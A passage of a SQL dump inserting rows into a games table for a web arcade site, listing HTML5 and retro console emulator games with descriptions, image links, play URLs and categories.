(369, 'Halloween Zombie Cannon', 'Throw balls at structures to make them collapse but be careful not to exceed the allowed limit! Each saved ball will count double at the next level, take advantage of it to apply you! One-tap easy-to-learn controls with stunning visual effects and addictive Halloween gameplay mechanics.', 'https://img.gamemonetize.com/mwbuw38d15yg9rswqzk3u9mnd8irm129/512x384.jpg', 'https://html5.gamemonetize.com/mwbuw38d15yg9rswqzk3u9mnd8irm129/', '0', 'Shooting', 0, 0, '', 0, ''),
(370, 'Noobik Battlegrounds', 'The tactical shooter Noobik Battlegrounds is waiting for you in its ranks, fighter. Online game in which you appear at a random point on the map, and then collect weapons and equipment, after which you kill the other players on map along the way. Game tasks: 1) Find weapons, equipment. 2) Gradually the zone will narrow to the center, you need to go to the center, otherwise you will be killed by zone that narrows. 3) There will be other survivors on your way, you will need to kill them all to win. 4) If you are killed, you can either watch other survivors or find a new session. 5) Winner is the one who remains the only one alive on map.', 'https://img.gamemonetize.com/5zf2l6ec0cef43uo7ftxbr0l386h0o6i/512x384.jpg', 'https://html5.gamemonetize.com/5zf2l6ec0cef43uo7ftxbr0l386h0o6i/', '0', 'Shooting', 0, 0, '', 0, '');
INSERT INTO `zon_games` (`id`, `game_name`, `game_description`, `game_image_url`, `game_url`, `game_published`, `game_category`, `game_status`, `game_played`, `game_banner_url`, `is_featured`, `game_card_size`) VALUES
(371, 'Warfare Area 3', 'Play 3D first person shooter game Warfare Area 3. Your mission is to explore the enemy base and take down all the guards in the area. Shoot enemies, pick up first aid kits and earn money to upgrade the armor and guns.', 'https://img.gamemonetize.com/9xa5tfoih6vphdexzk034fl8ycjwzffz/512x384.jpg', 'https://html5.gamemonetize.com/9xa5tfoih6vphdexzk034fl8ycjwzffz/', '0', 'Shooting', 0, 0, '', 0, ''),
(372, 'Heads Up Skibidi', 'Heads Up Skibidi is a head-ball game where one player is the skibidi head and poo picker. The skibidi head wears a blindfold and tries to head the ball into the poo pickers mouth. The poo picker tries to dodge the ball and pick up as much poo as possible.', 'https://img.gamemonetize.com/06ab0i2mp4ks3ul4iipkhoul1viwah2m/512x384.jpg', 'https://html5.gamemonetize.com/06ab0i2mp4ks3ul4iipkhoul1viwah2m/', '0', 'Soccer', 0, 0, '', 0, ''),
(373, 'Roblox Draw to Escape Online', 'Have fun drawing your way to the goal in Roblox Draw to Escape Online, an entertaining casual game where you can use your imagination to solve the problems in each level. Draw the platforms, or blocks for the obstacles and get to the end of each level. Keep in mind that you have a time limit to get there. With each level you can collect coins, and with each star discovered, you can earn some extra coins when you complete your level. Check each level carefully because you will come across objects that can disappear or explode and eliminate you.', 'https://img.gamemonetize.com/39ypfvhxe3j3zzbixcetxhinn0cs4ze1/512x384.jpg', 'https://html5.gamemonetize.com/39ypfvhxe3j3zzbixcetxhinn0cs4ze1/', '0', 'Hypercasual', 0, 0, '', 0, ''),
(374, 'Fruit Merge  Juice Jumble', 'Instructions: Drop fruits into the box and merge two of the same fruit to create a larger one! Click and drag to move the fruit to your desired spot, then release to let it fall into place and combine with any matching fruit below. Goal: Score as high as possible by merging fruits. When the box fills up, it&amp;rsquo;s game over! Tips for Success: Keep Similar Fruits Together: Position larger fruits close to each other. For example, if a pear and cherry are adjacent, dropping another pear could trigger a chain reaction.', 'https://img.gamemonetize.com/q2fw7p70k4lir0gee4af5jssenoa2kts/512x384.jpg', 'https://html5.gamemonetize.com/q2fw7p70k4lir0gee4af5jssenoa2kts/', '0', 'Puzzles', 0, 0, '', 0, ''),
(375, 'GT Racing', 'Immerse yourself in the heart-racing excitement of GT Racing, a game that captures the essence of classic 80s arcade racing. Offering exhilarating gameplay and an intuitive car control system, it takes you across 21 dynamic circuits filled with hidden surprises. The game&amp;rsquo;s vibrant, detailed graphics and flawless handling create an immersive racing experience. Feel the roar of the engine as you push for maximum speed, expertly using the turbo boost for those critical moments. With its compelling features and intense action, GT Racing is a must-play for any rally arcade racing fan.', 'https://img.gamemonetize.com/2pzz150ueqkyep3uzcox1alq16xx2i5k/512x384.jpg', 'https://html5.gamemonetize.com/2pzz150ueqkyep3uzcox1alq16xx2i5k/', '0', 'Racing', 0, 0, '', 0, ''),
(376, 'Squid Maze Challenge', 'Looking for the most realistic Squid game Experience? Well, squid game Maze challenge is the best choice for you! Just like candy and a pin challenge and like Run green and red light with The girl who stands towards the tree and saying green light red light challenge. In this Squid, players are forced to Run inside some mystery Mazes and the goal is to find the Exit Key and go to the finish Door in this squid task 2022, its called squid game Maze challenge. Some glass is easy to break and some are so strong. Be Smart while choosing your steps and paths or you will be Eliminated!', 'https://img.gamemonetize.com/kvflm9cp71z5lt83dqyp6nn3yw8a6ub4/512x384.jpg', 'https://html5.gamemonetize.com/kvflm9cp71z5lt83dqyp6nn3yw8a6ub4/', '0', 'Adventure', 0, 0, '', 0, ''),
(377, 'Lady Pool', 'Welcome to the vibrant world of a humorous dress up game where fashion collides with the comic book universe! Get ready for a creative reinterpretation of your favorite comic book antiheros costumes: bold color combinations, unexpected prints and fun accessories are available to you. You can practice your imagination in creating shocking images: from playful pajamas for parties to spectacular outfits for bold runway shows. There is everything here: from funny hats that emphasize individuality to stylish superhero jumpsuits. Unleash your imagination and let your character become a style icon!', 'https://img.gamemonetize.com/li60xx9s36usl56nx2dlv3oitnwlbrux/512x384.jpg', 'https://html5.gamemonetize.com/li60xx9s36usl56nx2dlv3oitnwlbrux/', '0', 'Girls', 0, 0, '', 0, ''),
(378, 'Noob Rocket Punch', 'Enjoy this new game. Rocket Punch is a stunning journey on the ring where you may demonstrate your talents for combat with gloves. If you like boxing games, this game is suitable for you. Train your mind and agility with this amusing and interesting game again. Kiz10 offers the best action games and fights. With the money you have earned from completing levels, you can unlock new gloves and upgrade your fighting abilities.', 'https://img.gamemonetize.com/oki61504wqe7msf67opq42oqj99oqf1w/512x384.jpg', 'https://html5.gamemonetize.com/oki61504wqe7msf67opq42oqj99oqf1w/', '0', 'Hypercasual', 0, 0, '', 0, ''),
(379, 'Battle Jitsu', 'In Battle Jitsu, you enter intense multiplayer online battles where strategy is everything. Carefully choose your cards and play the right element to beat your opponent. Fire, water, and ice face each other in a fast and dynamic duel. Master the elements, predict your opponents movements and prove yourself to be the true master of Battle Jitsu!', 'https://img.gamemonetize.com/cxu4dpr5uspgzim70lf6t4p6milazwr0/512x384.jpg', 'https://html5.gamemonetize.com/cxu4dpr5uspgzim70lf6t4p6milazwr0/', '0', 'Multiplayer', 0, 0, '', 0, ''),
(380, 'Color Path IO', 'Welcome to Color Path.io! Get ready to run and draw your color path to claim the biggest area. Strategize by drawing paths around your opponents to trap them and secure your victory. Can you outsmart and outmaneuver your rivals to become the ultimate champion?', 'https://img.gamemonetize.com/993brpbfu5u9o090ik0khqjsgf8t0kg6/512x384.jpg', 'https://html5.gamemonetize.com/993brpbfu5u9o090ik0khqjsgf8t0kg6/', '0', 'Multiplayer', 0, 0, '', 0, ''),
(381, 'Billiard Champion', 'Бильярд - одна из самых популярных игр в мире, она может развить у людей способность к логическому мышлению и хорошо тренировать их зрение, а также может тренировать терпение и способность к спокойному мышлению.', 'https://img.gamemonetize.com/6plitwan0l11bxzub092x7uqcwh4h5ix/512x384.jpg', 'https://html5.gamemonetize.com/6plitwan0l11bxzub092x7uqcwh4h5ix/', '0', 'Multiplayer', 0, 0, '', 0, ''),
(382, 'Board Kings Board Dice', 'Board Kings: Board Dice is a classic multiplayer strategy board game. Do you like to play Monopoly,Board Kings: Board Dice is similar to Monopoly. Become the real Board King by building and upgrading your empire with dice points, building and upgrading your board, or infiltrating other players boards and attacking their buildings. This is a game where luck and strength go hand in hand to win,how is your luck today? Join us for more surprises waiting to be unlocked!', 'https://img.gamemonetize.com/qylq7h9zvv6fm2qrr9e8yprpc0opdhjd/512x384.jpg', 'https://html5.gamemonetize.com/qylq7h9zvv6fm2qrr9e8yprpc0opdhjd/', '0', 'Multiplayer', 0, 0, '', 0, ''),
(383, 'HOLDEM CARD GAME', '** HOLDEM CARD GAME is A FREE-TO-PLAY ONLINE H5 GAME. * HOLDEM CARD GAME is the online Texas Holdem game that allows you to play poker games with millions of real players, on the most fun and exciting play money poker game out there. * Texas Hold&amp;rsquo;em poker is one of the most popular poker variants in the world. Despite its relative simplicity, Texas Hold&amp;rsquo;em has the potential to be played with a seemingly infinite variety of strategies and tactics. ** HOLDEM CARD GAME lets you: * PLAY CARD GAME ONLINE WITH MILLIONS OF REAL PLAYERS ~ Play online poker games with the world&amp;rsquo;s largest community of real poker players.', 'https://img.gamemonetize.com/sue3asusesjn6i2ty9ljk20yfqmbrs8k/512x384.jpg', 'https://html5.gamemonetize.com/sue3asusesjn6i2ty9ljk20yfqmbrs8k/', '0', 'Multiplayer', 0, 0, '', 0, ''),
(384, 'SEVEN CARD GAME', '** SEVEN CARD GAME is A FREE-TO-PLAY ONLINE H5 GAME. * SEVEN CARD GAME, which is called SEVEN CARD STUD, is a classic poker game which can take a lifetime to master. ** SEVEN CARD GAME lets you: * PLAY CARD GAME ONLINE WITH MILLIONS OF REAL PLAYERS ~ SEVEN CARD GAME is essentially seven card stud. This is a betting game with a 52-card deck. ~ In SEVEN CARD GAME, players are individually dealt seven cards throughout the course of the hand, but only the best five-card poker hand possible for each player is used to determine the winner.', 'https://img.gamemonetize.com/9ozup2d4051p0km7zna0749e6q2nvdqt/512x384.jpg', 'https://html5.gamemonetize.com/9ozup2d4051p0km7zna0749e6q2nvdqt/', '0', 'Multiplayer', 0, 0, '', 0, ''),
(385, 'Ballon Race 3D', 'In Balloon Race 3D, race against other players in a whimsical world where collecting balloons makes you fly! Start on the ground and gather as many balloons as you can to lift off and speed towards the finish line. The more balloons you collect, the higher and faster you soar. Aim to outmaneuver your rivals and be the first to cross the finish line in this thrilling airborne adventure! Collect coins to unclock new skins. Enjoy!', 'https://img.gamemonetize.com/kicr33skk5upsp3fd7njzieeapg3ytc3/512x384.jpg', 'https://html5.gamemonetize.com/kicr33skk5upsp3fd7njzieeapg3ytc3/', '0', 'Multiplayer', 0, 0, '', 0, ''),
(386, 'SEOTDA CARD GAME', '** SEOTDA CARD GAME is FREE-TO-PLAY ONLINE H5 GAME. * SEOTDA CARD GAME is a Korean card game using 20 Hwatu (hereinafter Card) in which players bet on the value of their dealt cards across multiple rounds, similar to other showdown games like Poker. ** SEOTDA CARD GAME lets you: * PLAY CARD GAME ONLINE WITH MILLIONS OF REAL PLAYERS ~ SEOTDA CARD GAME is essentially 2 card stud. This is a betting game, and while it uses the card deck, its assembled differently, only using 20 cards. ~ These cards are often adorned with floral designs and various symbols representing different months and seasons. The game is usually played by 2 to 5 player.', 'https://img.gamemonetize.com/q2tbi1xfufzvpp6d43h07gdnsanwlqpt/512x384.jpg', 'https://html5.gamemonetize.com/q2tbi1xfufzvpp6d43h07gdnsanwlqpt/', '0', 'Multiplayer', 0, 0, '', 0, ''),
(387, 'Badugi Card Game', 'Experience the best online card game with BADUGI. Join players worldwide in this exciting BADUGI Card Game experience. Play Now! Show your skills! ** BADUGI CARD GAME IS A FREE-TO-PLAY ONLINE GAME. * BADUGI originated in Korea and is a variant of draw poker. Its a card game using a poker card, but maybe not as you know it. It shares many similarities with Lowball, as it&amp;rsquo;s the lowest hand that wins. It differs significantly from most popular poker variants because the hand ranking system is different. The strongest hands are those that have no pairs and four low cards, one of each suit.', 'https://img.gamemonetize.com/gxn1j2wtbx6e1j6yhlzg5wws69p9v2t8/512x384.jpg', 'https://html5.gamemonetize.com/gxn1j2wtbx6e1j6yhlzg5wws69p9v2t8/', '0', 'Multiplayer', 0, 0, '', 0, ''),
(388, 'Math challenge online', 'Math Challenge is an exciting and educational game where you can test your arithmetic skills in a fun and competitive setting. At the start of each round, a mathematical equation appears at the top of the screen, involving any of the four basic operations: addition, subtraction, multiplication, or division. The game board is a grid filled with various numbers. You must control your avatar, navigating the grid to land on the number that solves the displayed equation. Quick thinking and swift movements are crucial, as each round has a limited time for you to position your avatar on the correct answer. Points are awarded for correct answers, an', 'https://img.gamemonetize.com/h9f5jfuk4rfcf8hnypmhsh8fkhezdu7t/512x384.jpg', 'https://html5.gamemonetize.com/h9f5jfuk4rfcf8hnypmhsh8fkhezdu7t/', '0', 'Multiplayer', 0, 0, '', 0, ''),
(389, 'Racing Gun', 'Gun Sprint Online is a fast-paced multiplayer shooter where players compete in intense races while engaging in thrilling gun battles. Set in dynamic, ever-changing environments, players must navigate obstacles, dodge enemy fire, and strategically use power-ups to outmaneuver opponents and reach the finish line first. With customizable characters, a variety of weapons, and a range of challenging maps, Gun Sprint Online offers endless excitement for players seeking high-octane action and fierce competition. Team up with friends or go solo in this adrenaline-pumping race to victory!', 'https://img.gamemonetize.com/bmtr36i9huzstsuag0k8jkwrmna45fuv/512x384.jpg', 'https://html5.gamemonetize.com/bmtr36i9huzstsuag0k8jkwrmna45fuv/', '0', 'Multiplayer', 0, 0, '', 0, ''),
(390, 'Crazy Basketball Shots', 'Step into the thrilling world of Crazy Basketball Shots, where precision meets fun! Test your skills as you aim, shoot, and score in this exciting basketball challenge. The game features a basket hoop and a basketball, providing the perfect setup for endless shooting action. With every shot, the difficulty increases, keeping you on your toes as you perfect your aim and timing. Whether youre a basketball enthusiast or just looking for a quick and engaging way to pass the time, Crazy Basketball Shots is the ultimate game for you! Are you ready to make those epic shots and set high scores? Let the hoops frenzy begin!', 'https://img.gamemonetize.com/ywlcgobsusmt8glsay6ticjcy64nzd3i/512x384.jpg', 'https://html5.gamemonetize.com/ywlcgobsusmt8glsay6ticjcy64nzd3i/', '0', 'Sports', 0, 0, '', 0, ''),
(391, 'Bunny Goal', 'Are you ready to kick, bounce, and score? Bunny Goal combines the thrill of soccer with the fast-paced fun of pinball, creating a unique game that&amp;rsquo;s perfect for all ages! Join our adorable bunny character on a journey to become a soccer superstar. Each level is packed with vibrant environments, challenging obstacles, and dynamic pinball action that requires quick reflexes and sharp strategy. Whether you&amp;rsquo;re looking for a quick fun game to pass the time or aiming to beat every level and set a high score, Bunny Goal has something for everyone. Are you ready to take on the pinball soccer challenge and lead the bunny to victory?', 'https://img.gamemonetize.com/mnqj10l3wzrla0pcc7jdw7lqo2wbwiq9/512x384.jpg', 'https://html5.gamemonetize.com/mnqj10l3wzrla0pcc7jdw7lqo2wbwiq9/', '0', 'Sports', 0, 0, '', 0, ''),
(392, 'Mini Boxing', 'Mini Boxing is a fantastic super-deformed boxing game where you control the boxer Nick-Joe and help him win the Boxer Championship Tournament! To claim victory, youll need to face and defeat six unique and quirky boxers, each with their own fighting style. The game is incredibly easy to play, with three main moves: Mini Boxing is inspired by classic 1980s arcade games, featuring charming super-deformed graphics and smooth animations.', 'https://img.gamemonetize.com/wgdaxwl09pqgakqlidsvnv9ah5wdk2lc/512x384.jpg', 'https://html5.gamemonetize.com/wgdaxwl09pqgakqlidsvnv9ah5wdk2lc/', '0', 'Sports', 0, 0, '', 0, ''),
(393, 'jurassic park', '<p>jurassic park game the dinoseur.</p>', 'https://yassi.xyz/book/dino.png', 'https://msdos-games.com/game/?prn=jp', 'Yes', 'SEGA', 0, 0, '', 0, 'md'),
(394, 'Super Bomberman', '<p>Super Bomberman , released by Hudson Soft in early 1997, was the final Bomberman game to grace the Super Family Computer. The game was released in two variations: a standard cartridge and a gold cartridge, which was sold exclusively through CoroCoro Comic. The gold cartridge included extra maps in battle mode.</p>', 'https://yassi.xyz/book/bomb.png', 'https://supernintendoemulator.com/game/?game=Super_Bomberman_5_Gold_Cartridge', 'Yes', 'Nintendo', 0, 0, '', 0, 'md'),
(395, 'Dragon Ball Z', '<p><strong>Dragon Ball Z: Hyper Dimension is the final Dragon Ball Z fighting game released for the Super Nintendo.[1] It was released in Japan on March 29, 1996,[2] and in France and Spain in December 1996. The Japanese version of the game features a story mode that begins with the Frieza Saga and ends with the Majin Buu Saga.[3] The characters\' health is measured by a number system, which can be recharged at any time during the game. During the fight, it is possible for opponents to knock each other to other battlefields.</strong></p><p><strong>Personagens</strong></p><ul><li>Son Goku</li><li>Vegeta</li><li>Son Gohan</li><li>cell</li><li>Piccolo</li><li>Vegetto</li><li>Freeza</li><li>Fat Boo</li><li>Kid Boo</li><li>Gotenks</li></ul>', 'https://yassi.xyz/book/dragon.png', 'https://supernintendoemulator.com/game/?game=dbzh', 'Yes', 'Multiplayer', 0, 0, '', 0, 'md'),
(396, 'SpiderMan and Venom', '<p>SpiderMan and Venom: Maximum Carnage is a side-scrolling beat \'em up video game for the Super NES and Sega Mega Drive/Genesis, developed by Software Creations and published by LJN (a subsidiary of Acclaim) in 1994. The game, based on a sprawling comic book story arc of the same name, featured numerous heroes, including Spider-Man, Venom, and their allies from the Marvel Comics fictional universe like Captain America, Black Cat, Iron Fist, Cloak and Dagger, Deathlok, Morbius and Firestar, all teaming up to battle an onslaught of villains led by Carnage, including Shriek, Doppelganger, Demogoblin and Carrion.[1] The game featured a colored cartridge. Both the Sega Mega Drive/Genesis and Super Nintendo versions were red. They were later released in the normal cartridge colors (black for Genesis, gray for SNES). The game was followed up by a sequel called Venom/Spider-Man: Separation Anxiety. Universal Studios Orlando used Maximum Carnage as the theme for a haunted house at Halloween Horror Nights in 2002</p>', 'https://yassi.xyz/book/spider.png', 'https://supernintendoemulator.com/game/?game=Spider-Man_-_Maximum_Carnage', 'Yes', 'Nintendo', 0, 0, '', 0, 'md'),
(397, 'The Flintstones', '<p>The Flintstones is a 1993 platformer for the Sega Mega Drive by Taito made with the The Flintstones license. Wilma has lost some things and it\'s up to you, as Fred, to go find them. A and C jump. B attacks enemies. To climb up ledges, stand near the ledge and jump, then hold the jump button to grab on, then hit Up while holding the jump button to climb.</p><p><strong>How to play:</strong></p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left<br><br>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button<br><br>Q = L Button<br>E = R Button<br><br>Shift = Select<br>Enter = Start</p>', 'https://yassi.xyz/book/fli.png', 'https://megadrive-emulator.com/game/?game=Flintstones_The_U.bin', 'Yes', 'SEGA', 0, 0, '', 0, 'md'),
(421, 'Marvel Super Heroes:', '<p><strong>Game Information:</strong></p><p>Marvel Super Heroes: War of the Games is a 2D action platformer video game developed by Capcom for the Super Nintendo Entertainment System, based on the events of Marvel Comics\' series, Infinity Gauntlet. In the game\'s plot, Adam Warlock calls upon Earth\'s greatest super heroes to seek out the Infinity Gems before they fall into the wrong hands. Although War of the Gems is based on the same storyline as the Capcom arcade game Marvel Super Heroes, it is not a port; War of the Gems instead features gameplay similar to X-Men: Mutant Apocalypse.</p><p><strong>How to play:</strong></p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left<br><br>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button<br><br>Q = L Button<br>E = R Button<br><br>Shift = Select<br>Enter = Start</p>', 'https://yassi.xyz/book/marvel.png', 'https://supernintendoemulator.com/game/?game=Marvel_Super_Heroes_-_War_of_the_Gem', 'Yes', 'Nintendo', 0, 0, '', 0, 'md'),
(422, 'Marvel Super Heroes:', '<p><strong>Game Information:</strong></p><p>Disney\'s Magical Quest, known in Japan as Mickey\'s Magical Adventure &nbsp;Mikī no Majikaru Adobenchā?), is a Disney platform game trilogy released by Capcom. The games star Mickey Mouse and, (depending on the game version), either Minnie Mouse or Donald Duck, who must defeat Peg-Leg Pete. The gameplay is similar among all games in the series: the player must move as in a typical platform game, defeating enemies either by jumping on them or by grabbing and throwing blocks at them. One of the most notable gameplay features of the series is the ability to change characters\' outfits, which give characters different special abilities. Other gameplay elements in the series include the ability to expand the player\'s health meter by collecting special hearts, and to shop for items using coins that are scattered throughout the game.</p><p><strong>How to play:</strong></p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left<br><br>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button<br><br>Q = L Button<br>E = R Button<br><br>Shift = Select<br>Enter = Start</p>', 'https://yassi.xyz/book/miki.png', 'https://supernintendoemulator.com/game/?game=The_Magical_Quest_Starring_Mickey_Mouse', 'Yes', 'Nintendo', 0, 0, '', 0, 'md'),
(423, 'Breath of Fire II', '<p><strong>Game Information:</strong></p><p>Breath of Fire II Hepburn: Buresu obu Faia Tsū: Shimei no Ko?, Breath of Fire II: The Destined Child) is a role-playing video game developed and published by Capcom. First released in 1994, the game was licensed to Laguna for European release in 1996. It is the second entry in the Breath of Fire series. It was later ported to Game Boy Advance and re-released worldwide. The game has been rated by the ESRB for release on Wii\'s Virtual Console and was released in North America on August 27, 2007. Nintendo of Europe\'s website mistakenly announced it for release on July 27, 2007, but it was in fact released two weeks later, on August 10, 2007. Unlike later installments in the series, Breath of Fire II is a direct sequel to Breath of Fire. Set 500 years after the original game,[1] the story centers on an orphan named Ryu Bateson, whose family vanished mysteriously long ago. After his friend is falsely accused of a crime, Ryu embarks on a journey to clear his name.</p><p><strong>How to play:</strong></p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left<br><br>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button<br><br>Q = L Button<br>E = R Button<br><br>Shift = Select<br>Enter = Start</p>', 'https://yassi.xyz/book/war.png', 'https://supernintendoemulator.com/game/?game=Breath_of_Fire_II', 'Yes', 'Nintendo', 0, 0, '', 0, 'md'),
(424, 'Tiny Toon Adventures', '<p><strong>Game Information:</strong></p><p>Tiny Toon Adventures: Buster Busts Loose! (released in Japan as simply Tiny Toon Adventures) is a video game for the Super NES console that is based on the animated TV series Tiny Toon Adventures. It was published, developed and released by Konami in 1992.</p><p><strong>How to play:</strong></p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left<br><br>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button<br><br>Q = L Button<br>E = R Button<br><br>Shift = Select<br>Enter = Start</p>', 'https://yassi.xyz/book/arnab.png', 'https://supernintendoemulator.com/game/?game=Tiny_Toon_Adventures_-_Buster_Busts_Loose', 'Yes', 'Nintendo', 0, 0, '', 0, 'md'),
(425, 'StarFox ', '<p><strong>Game Information:</strong></p><p>StarFox released as Starwing in Europe due to a game of the same name and subsequent trademark issues in that region, is the first game in the Star Fox series of video games, released on February 21, 1993 in Japan, on March 23, 1993 in North America, and on June 3, 1993 in Europe for the Super Famicom/Super Nintendo Entertainment System. It was the second three-dimensional Nintendo-developed game (behind 1992\'s X, also developed by Nintendo EAD together with Argonaut Software) and it included the Super FX chip, a coprocessor used to accelerate graphics display, which became Nintendo\'s first game to use 3D polygon graphics. The complex display of three-dimensional models with polygons was still new and uncommon in console video games, and the game was much-hyped as a result. Star Fox featured anthropomorphic character designs by Nintendo artist Takaya Imamura, music composed by Hajime Hirasawa and obstacle course style gameplay. Star Fox was developed by Nintendo EAD with assistance by Argonaut Software, and was published by Nintendo. The game was a critical and commercial success, which established Star Fox as one of Nintendo\'s flagship franchises. The storyline involves Fox McCloud and the rest of the Star Fox team, who must defend their homeworld of Corneria against the attacking forces of Andross.[1]</p><p><strong>How to play:</strong></p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left<br><br>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button<br><br>Q = L Button<br>E = R Button<br><br>Shift = Select<br>Enter = Start</p>', 'https://yassi.xyz/book/star.png', 'https://supernintendoemulator.com/game/?game=Star_Fox', 'Yes', 'Nintendo', 0, 0, '', 0, ''),
(448, 'Sparkster ', '<p><strong>Sparkster </strong>is a 16-bit generation side scrolling platformer produced and released in 1994 by Konami for the Super Famicom/Super Nintendo Entertainment System, directed by Hideo Ueda (Axelay). It is a different game from the Mega Drive version, which bore the full title of Sparkster: Rocket Knight Adventures 2, and has no plot continuity with the original Rocket Knight Adventures for the Mega Drive.</p><p><strong>How to play:</strong></p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left<br><br>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button<br><br>Q = L Button<br>E = R Button<br><br>Shift = Select<br>Enter = Start</p>', 'https://yassi.xyz/book/spakter.png', 'https://supernintendoemulator.com/game/?game=Sparkster', 'Yes', 'Nintendo', 0, 0, '', 0, 'md'),
(449, 'Run Saber', '<p>Run Saber is a 1993 side-scrolling action video game developed by Horisoft and published by Atlus for the Super Nintendo Entertainment System. The game was released in North America on June 8, 1993, and in Europe in 1993. Run Saber features side-scrolling fighting as the two main heroes, Allen and Sheena, the Run Sabers, fight to save the planet. The gameplay is very similar to Strider.</p><p><strong>How to play:</strong></p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left<br><br>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button<br><br>Q = L Button<br>E = R Button<br><br>Shift = Select<br>Enter = Start</p>', 'https://yassi.xyz/book/run.png', 'https://supernintendoemulator.com/game/?game=Run_Saber', 'Yes', 'Nintendo', 0, 0, '', 0, ''),
(450, 'Jungle Strike', '<p>Jungle Strike is a video game developed (in association with Mike Posehn) and published by Electronic Arts in 1993. It was originally released for the Mega Drive, before being ported to several other systems including an upgraded version for the Amiga. The Amiga and other home computer conversions were the responsibility of Ocean Software while the Super Nintendo Entertainment System version was that of Gremlin Interactive. The game is a helicopter based shoot \'em up, mixing action and strategy. It is the sequel to Desert Strike: Return to the Gulf (a best-seller released in 1992) and is the second game in the Strike series. Jungle Strike retained its predecessor\'s core mechanics and expanded on the model with additional vehicles and settings. The plot concerns two villains intent on destroying Washington, D.C.. The player must use the helicopter and occasionally other vehicles to thwart their plans. The game was critically acclaimed, with some reviewers awarding scores upwards of 90%. Publications praised its gameplay, strategy, design, controls and graphics, although there were some complaints regarding the interface, difficulty and perceived jingoistic politics. The President of the United States in the game is not named, but is apparently modeled after Bill Clinton, who in a cut scene praises the player for protecting him and apologizes for cutting the defense budget.</p><p><strong>How to play:</strong></p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left<br><br>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button<br><br>Q = L Button<br>E = R Button<br><br>Shift = Select<br>Enter = Start</p>', 'https://yassi.xyz/book/tiyara.png', 'https://supernintendoemulator.com/game/?game=Jungle_Strike', 'Yes', 'Nintendo', 0, 0, '', 0, ''),
(451, 'Mega Man 7', '<p>Mega Man 7, known as Rockman 7 Shukumei no Taiketsu Rokkuman Sebun Shukumei no Taiketsu!?, lit. \'Rockman 7: Showdown of Destiny!\') in Japan, is a video game developed by Capcom for the Super Nintendo Entertainment System. It is the seventh game in the original Mega Man series and the first and only title in the main series to be featured on the 16-bit console. The video game was first released in Japan on March 24, 1995 and was localized later in the year in North America and Europe. The game is also available for the PlayStation 2, Nintendo GameCube, and Xbox as part of the Mega Man Anniversary Collection. It is also known for the information that is given to the player in the Shade Man stage. Mega Man 7 was created to revitalize the original franchise after the release of Mega Man X, which got very positive reviews. However, it scored lower ratings than Mega Man X, and was seen as an inferior game to Mega Man X by fans. Picking up directly after the events of Mega Man 6, the plot involves the protagonist Mega Man once again attempting to stop the evil Dr. Wily, who uses a new set of Robot Masters to free himself from captivity and begin wreaking havoc on the world. Along with some help from his old friends, Mega Man finds potential allies in the mysterious robot pair Bass and Treble, who are later revealed to be in league with Wily. In terms of gameplay, Mega Man 7 follows that same classic action and platforming introduced in the 8-bit Nintendo Entertainment System (NES) titles, but updates the graphics and sound of the series for the more powerful SNES. According to its creators, Mega Man 7 was only in development for a short time before its release. Keiji Inafune, a noted character designer and illustrator for the franchise, handed off his duties to Hayato Kaji for this installment. Mega Man 7 has received an overall average critical reception. Although many considered it a competent game by itself, a majority of reviewers either called it a simple rehash of previous entries in the Mega Man saga, or considered it inferior to the inventive spin-off Mega Man X, released on the SNES over a year earlier.</p><p><strong>How to play:</strong></p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left<br><br>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button<br><br>Q = L Button<br>E = R Button<br><br>Shift = Select<br>Enter = Start</p>', 'https://yassi.xyz/book/mega.png', 'https://supernintendoemulator.com/game/?game=Mega_Man__7', 'Yes', 'Nintendo', 0, 0, '', 1, 'md'),
(452, 'angrybirds', '<p>Angry Bird it is good game the role is choots the bird for kill enemies</p>', 'https://yassi.xyz/book/angrybirds.png', 'https://funhtml5games.com/?play=angrybirds', 'Yes', 'Shooter', 0, 0, '', 0, 'md'),
(453, 'Final Fantasy V', '<p>Final Fantasy V &nbsp;is a medieval-fantasy role-playing video game developed and published by Square (now Square Enix) in 1992 as a part of the Final Fantasy series. The game first appeared only in Japan on Nintendo\'s Super Famicom (known internationally as the Super Nintendo Entertainment System). It has been ported with minor differences to Sony\'s PlayStation and Nintendo\'s Game Boy Advance. An original video animation produced in 1994 called Final Fantasy: Legend of the Crystals serves as a sequel to the events depicted in the game. It was released for the PlayStation Network on April 6, 2011 in Japan. An enhanced port of the game, with new high resolution graphics and touch-based interface, was released for iPhone and iPad on March 28, 2013 with Android released on September 25, 2013. The game begins as a wanderer named Bartz investigates a fallen meteor. There, he encounters several characters, one of whom reveals the danger facing the four Crystals that control the world\'s elements. These Crystals act as a seal on Exdeath, an evil sorcerer. Bartz and his party must keep the Crystals from being exploited by Exdeath\'s influence and prevent his resurgence. Final Fantasy V has been praised for the freedom of customization that the player has over the characters, achieved through the greatly expanded Job System. Despite the lack of an early release in territories other than Japan, the Super Famicom version sold more than two million copies. The PlayStation version has earned \'Greatest Hits\' status, selling more than 350,000 copies.</p>', 'https://yassi.xyz/book/final.png', 'https://supernintendoemulator.com/game/?game=Final_Fantasy_V', 'Yes', 'Nintendo', 0, 0, 'https://supernintendoemulator.com/game/?game=Final_Fantasy_V', 0, 'md'),
